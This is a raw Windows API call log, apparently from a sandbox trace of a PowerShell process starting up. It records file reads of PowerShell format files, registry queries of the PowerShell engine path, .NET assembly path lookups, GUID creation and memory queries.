	[0088.784] ReadFile (in: hFile=0x29c, lpBuffer=0x17029c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x17029c8*, lpNumberOfBytesRead=0x14e794*=0x1000, lpOverlapped=0x0) returned 1
	[0088.784] GetLastError () returned 0x0
	[0088.785] ReadFile (in: hFile=0x29c, lpBuffer=0x17029c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x17029c8*, lpNumberOfBytesRead=0x14e794*=0x1000, lpOverlapped=0x0) returned 1
	[0088.785] GetLastError () returned 0x0
	[0088.785] ReadFile (in: hFile=0x29c, lpBuffer=0x17029c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x17029c8*, lpNumberOfBytesRead=0x14e794*=0x1000, lpOverlapped=0x0) returned 1
	[0088.785] GetLastError () returned 0x0
	[0088.785] ReadFile (in: hFile=0x29c, lpBuffer=0x17029c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x17029c8*, lpNumberOfBytesRead=0x14e794*=0x1000, lpOverlapped=0x0) returned 1
	[0088.786] GetLastError () returned 0x0
	[0088.786] ReadFile (in: hFile=0x29c, lpBuffer=0x17029c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x17029c8*, lpNumberOfBytesRead=0x14e794*=0xfb2, lpOverlapped=0x0) returned 1
	[0088.787] GetLastError () returned 0x0
	[0088.787] ReadFile (in: hFile=0x29c, lpBuffer=0x170211a, nNumberOfBytesToRead=0x4e, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x170211a*, lpNumberOfBytesRead=0x14e794*=0x0, lpOverlapped=0x0) returned 1
	[0088.787] GetLastError () returned 0x0
	[0088.787] ReadFile (in: hFile=0x29c, lpBuffer=0x17029c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x17029c8*, lpNumberOfBytesRead=0x14e794*=0x0, lpOverlapped=0x0) returned 1
	[0088.787] GetLastError () returned 0x0
	[0088.787] CloseHandle (hObject=0x29c) returned 1
	[0088.787] GetLastError () returned 0x0
	[0088.787] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e2f4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0088.787] GetLastError () returned 0x0
	[0088.787] SetErrorMode (uMode=0x1) returned 0x1
	[0088.787] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1723258 | out: lpFileInformation=0x1723258*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a1f4ab5, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a1f4ab5, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd374b67c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0088.787] GetLastError () returned 0x0
	[0088.787] SetErrorMode (uMode=0x1) returned 0x1
	[0088.787] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0088.787] GetLastError () returned 0x0
	[0088.787] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e718 | out: phkResult=0x14e718*=0x29c) returned 0x0
	[0088.787] RegQueryValueExW (in: hKey=0x29c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14e760, lpData=0x0, lpcbData=0x14e75c*=0x0 | out: lpType=0x14e760*=0x1, lpData=0x0, lpcbData=0x14e75c*=0x56) returned 0x0
	[0088.787] RegQueryValueExW (in: hKey=0x29c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14e760, lpData=0x361778, lpcbData=0x14e75c*=0x56 | out: lpType=0x14e760*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14e75c*=0x56) returned 0x0
	[0088.787] RegCloseKey (hKey=0x29c) returned 0x0
	[0088.788] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0088.788] GetLastError () returned 0x0
	[0088.788] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e254, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0088.788] GetLastError () returned 0x0
	[0088.789] CoCreateGuid (in: pguid=0x14e788 | out: pguid=0x14e788*(Data1=0x557dd0ae, Data2=0xade5, Data3=0x435b, Data4=([0]=0xb3, [1]=0xc5, [2]=0x99, [3]=0x3e, [4]=0x39, [5]=0x54, [6]=0xc7, [7]=0xb4))) returned 0x0
	[0088.789] CoCreateGuid (in: pguid=0x14e788 | out: pguid=0x14e788*(Data1=0x97809909, Data2=0x2e0c, Data3=0x4691, Data4=([0]=0xab, [1]=0xb7, [2]=0xc9, [3]=0x1, [4]=0x12, [5]=0x9a, [6]=0x5d, [7]=0x7a))) returned 0x0
	[0088.789] CoCreateGuid (in: pguid=0x14e788 | out: pguid=0x14e788*(Data1=0xd9818930, Data2=0xbb5, Data3=0x4743, Data4=([0]=0x8a, [1]=0x83, [2]=0x4e, [3]=0xab, [4]=0xd2, [5]=0x3, [6]=0x29, [7]=0x5b))) returned 0x0
	[0088.790] CoCreateGuid (in: pguid=0x14e788 | out: pguid=0x14e788*(Data1=0x1642064a, Data2=0x7e02, Data3=0x4042, Data4=([0]=0x97, [1]=0x1e, [2]=0x3c, [3]=0xc3, [4]=0x18, [5]=0xa3, [6]=0x17, [7]=0x79))) returned 0x0
	[0088.790] CoCreateGuid (in: pguid=0x14e788 | out: pguid=0x14e788*(Data1=0xf51b3381, Data2=0xc11b, Data3=0x4469, Data4=([0]=0xad, [1]=0x61, [2]=0x4f, [3]=0x8b, [4]=0xbd, [5]=0x94, [6]=0x18, [7]=0x3a))) returned 0x0
	[0088.790] CoCreateGuid (in: pguid=0x14e788 | out: pguid=0x14e788*(Data1=0xa577b598, Data2=0xfbc5, Data3=0x4573, Data4=([0]=0x88, [1]=0x87, [2]=0xa4, [3]=0xb8, [4]=0x5c, [5]=0xcf, [6]=0xf2, [7]=0xc))) returned 0x0
	[0088.790] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e22c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0088.790] GetLastError () returned 0x0
	[0088.790] SetErrorMode (uMode=0x1) returned 0x1
	[0088.791] GetFileType (hFile=0x29c) returned 0x1
	[0088.791] SetErrorMode (uMode=0x1) returned 0x1
	[0088.791] GetFileType (hFile=0x29c) returned 0x1
	[0088.791] ReadFile (in: hFile=0x29c, lpBuffer=0x1742c00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x1742c00*, lpNumberOfBytesRead=0x14e794*=0x1000, lpOverlapped=0x0) returned 1
	[0088.793] GetLastError () returned 0x0
	[0088.793] ReadFile (in: hFile=0x29c, lpBuffer=0x1742c00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x1742c00*, lpNumberOfBytesRead=0x14e794*=0x1000, lpOverlapped=0x0) returned 1
	[0088.793] GetLastError () returned 0x0
	[0088.794] ReadFile (in: hFile=0x29c, lpBuffer=0x1742c00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x1742c00*, lpNumberOfBytesRead=0x14e794*=0x1000, lpOverlapped=0x0) returned 1
	[0088.794] GetLastError () returned 0x0
	[0088.794] ReadFile (in: hFile=0x29c, lpBuffer=0x1742c00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x1742c00*, lpNumberOfBytesRead=0x14e794*=0x1000, lpOverlapped=0x0) returned 1
	[0088.794] GetLastError () returned 0x0
	[0088.794] ReadFile (in: hFile=0x29c, lpBuffer=0x1742c00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x1742c00*, lpNumberOfBytesRead=0x14e794*=0x1000, lpOverlapped=0x0) returned 1
	[0088.794] GetLastError () returned 0x0
	[0088.795] ReadFile (in: hFile=0x29c, lpBuffer=0x1742c00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x1742c00*, lpNumberOfBytesRead=0x14e794*=0x1000, lpOverlapped=0x0) returned 1
	[0088.795] GetLastError () returned 0x0
	[0088.795] ReadFile (in: hFile=0x29c, lpBuffer=0x1742c00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x1742c00*, lpNumberOfBytesRead=0x14e794*=0xaca, lpOverlapped=0x0) returned 1
	[0088.795] GetLastError () returned 0x0
	[0088.795] ReadFile (in: hFile=0x29c, lpBuffer=0x174226a, nNumberOfBytesToRead=0x136, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x174226a*, lpNumberOfBytesRead=0x14e794*=0x0, lpOverlapped=0x0) returned 1
	[0088.795] GetLastError () returned 0x0
	[0088.795] ReadFile (in: hFile=0x29c, lpBuffer=0x1742c00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x1742c00*, lpNumberOfBytesRead=0x14e794*=0x0, lpOverlapped=0x0) returned 1
	[0088.795] GetLastError () returned 0x0
	[0088.795] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e2f4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0088.795] GetLastError () returned 0x0
	[0088.795] SetErrorMode (uMode=0x1) returned 0x1
	[0088.795] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1763bfc | out: lpFileInformation=0x1763bfc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a051ba0, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a051ba0, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2d2d8fc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0088.795] GetLastError () returned 0x0
	[0088.795] SetErrorMode (uMode=0x1) returned 0x1
	[0088.795] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0088.795] GetLastError () returned 0x0
	[0088.795] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e718 | out: phkResult=0x14e718*=0x29c) returned 0x0
	[0088.795] RegQueryValueExW (in: hKey=0x29c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14e760, lpData=0x0, lpcbData=0x14e75c*=0x0 | out: lpType=0x14e760*=0x1, lpData=0x0, lpcbData=0x14e75c*=0x56) returned 0x0
	[0088.796] RegQueryValueExW (in: hKey=0x29c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14e760, lpData=0x361778, lpcbData=0x14e75c*=0x56 | out: lpType=0x14e760*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14e75c*=0x56) returned 0x0
	[0088.796] RegCloseKey (hKey=0x29c) returned 0x0
	[0088.796] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0088.796] GetLastError () returned 0x0
	[0088.796] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e254, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0088.796] GetLastError () returned 0x0
	[0088.798] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x14df84, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3a
	[0088.798] GetLastError () returned 0x0
	[0088.799] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14df84, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0088.799] GetLastError () returned 0x57
	[0088.804] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x14df84, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0088.804] GetLastError () returned 0x57
	[0088.810] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14df84, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0088.810] GetLastError () returned 0x57
	[0088.816] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x14df84, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0088.816] GetLastError () returned 0x57
	[0088.819] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", nBufferLength=0x105, lpBuffer=0x14df84, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", lpFilePart=0x0) returned 0x52
	[0088.819] GetLastError () returned 0x57
	[0088.820] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", nBufferLength=0x105, lpBuffer=0x14df84, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", lpFilePart=0x0) returned 0x74
	[0088.820] GetLastError () returned 0x57
	[0088.821] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x14df84, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0088.821] GetLastError () returned 0x57
	[0088.822] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_32\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", nBufferLength=0x105, lpBuffer=0x14df84, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_32\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", lpFilePart=0x0) returned 0x60
	[0088.822] GetLastError () returned 0x57
	[0088.822] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x14df84, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0088.822] GetLastError () returned 0x57
	[0088.823] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x14df84, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0088.823] GetLastError () returned 0x57
	[0088.824] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x14df84, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0088.824] GetLastError () returned 0x57
	[0088.825] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", nBufferLength=0x105, lpBuffer=0x14df84, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", lpFilePart=0x0) returned 0x50
	[0088.825] GetLastError () returned 0x57
	[0088.826] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", nBufferLength=0x105, lpBuffer=0x14df84, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", lpFilePart=0x0) returned 0x5e
	[0088.826] GetLastError () returned 0x57
	[0088.826] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", nBufferLength=0x105, lpBuffer=0x14df84, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", lpFilePart=0x0) returned 0x6c
	[0088.826] GetLastError () returned 0x57
	[0088.827] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x14df84, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3a
	[0088.827] GetLastError () returned 0x57
	[0088.827] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14df84, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0088.827] GetLastError () returned 0x57
	[0088.828] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x14df84, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0088.828] GetLastError () returned 0x57
	[0088.828] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14df84, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0088.828] GetLastError () returned 0x57
	[0088.828] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0088.828] GetLastError () returned 0x57
	[0088.828] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14df70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0088.828] GetLastError () returned 0x57
	[0088.828] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14df70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0088.828] GetLastError () returned 0x57
	[0088.828] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14df70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0088.828] GetLastError () returned 0x57
	[0088.857] VirtualQuery (in: lpAddress=0x14d470, lpBuffer=0x14e470, dwLength=0x1c | out: lpBuffer=0x14e470*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.857] CoCreateGuid (in: pguid=0x14e788 | out: pguid=0x14e788*(Data1=0x4a50a4c5, Data2=0x8b54, Data3=0x4025, Data4=([0]=0xab, [1]=0xb, [2]=0x65, [3]=0x49, [4]=0x7, [5]=0x4b, [6]=0xa8, [7]=0x6a))) returned 0x0
	[0088.858] CoCreateGuid (in: pguid=0x14e788 | out: pguid=0x14e788*(Data1=0x79cb786a, Data2=0xab2f, Data3=0x43ce, Data4=([0]=0xab, [1]=0x29, [2]=0x1f, [3]=0x74, [4]=0x10, [5]=0x53, [6]=0xab, [7]=0xe0))) returned 0x0
	[0088.859] VirtualQuery (in: lpAddress=0x14d4e8, lpBuffer=0x14e4e8, dwLength=0x1c | out: lpBuffer=0x14e4e8*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.859] VirtualQuery (in: lpAddress=0x14d4e8, lpBuffer=0x14e4e8, dwLength=0x1c | out: lpBuffer=0x14e4e8*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.859] CoCreateGuid (in: pguid=0x14e788 | out: pguid=0x14e788*(Data1=0x453534a8, Data2=0xad4f, Data3=0x402d, Data4=([0]=0xa6, [1]=0x51, [2]=0xda, [3]=0x7d, [4]=0x88, [5]=0xf0, [6]=0xd2, [7]=0x2f))) returned 0x0
	[0088.860] CoCreateGuid (in: pguid=0x14e788 | out: pguid=0x14e788*(Data1=0xf5817e6e, Data2=0xaf73, Data3=0x4b03, Data4=([0]=0xa8, [1]=0x19, [2]=0x91, [3]=0x7e, [4]=0xa9, [5]=0x1e, [6]=0x94, [7]=0xe5))) returned 0x0
	[0088.860] VirtualQuery (in: lpAddress=0x14d614, lpBuffer=0x14e614, dwLength=0x1c | out: lpBuffer=0x14e614*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.860] VirtualQuery (in: lpAddress=0x14d4c0, lpBuffer=0x14e4c0, dwLength=0x1c | out: lpBuffer=0x14e4c0*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.860] VirtualQuery (in: lpAddress=0x14d4c0, lpBuffer=0x14e4c0, dwLength=0x1c | out: lpBuffer=0x14e4c0*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.860] CoCreateGuid (in: pguid=0x14e788 | out: pguid=0x14e788*(Data1=0xc1acf942, Data2=0x108c, Data3=0x46d8, Data4=([0]=0xb4, [1]=0xd9, [2]=0xd2, [3]=0xc9, [4]=0xb0, [5]=0x2e, [6]=0x6e, [7]=0xb5))) returned 0x0
	[0088.861] VirtualQuery (in: lpAddress=0x14d614, lpBuffer=0x14e614, dwLength=0x1c | out: lpBuffer=0x14e614*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.861] VirtualQuery (in: lpAddress=0x14d52c, lpBuffer=0x14e52c, dwLength=0x1c | out: lpBuffer=0x14e52c*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
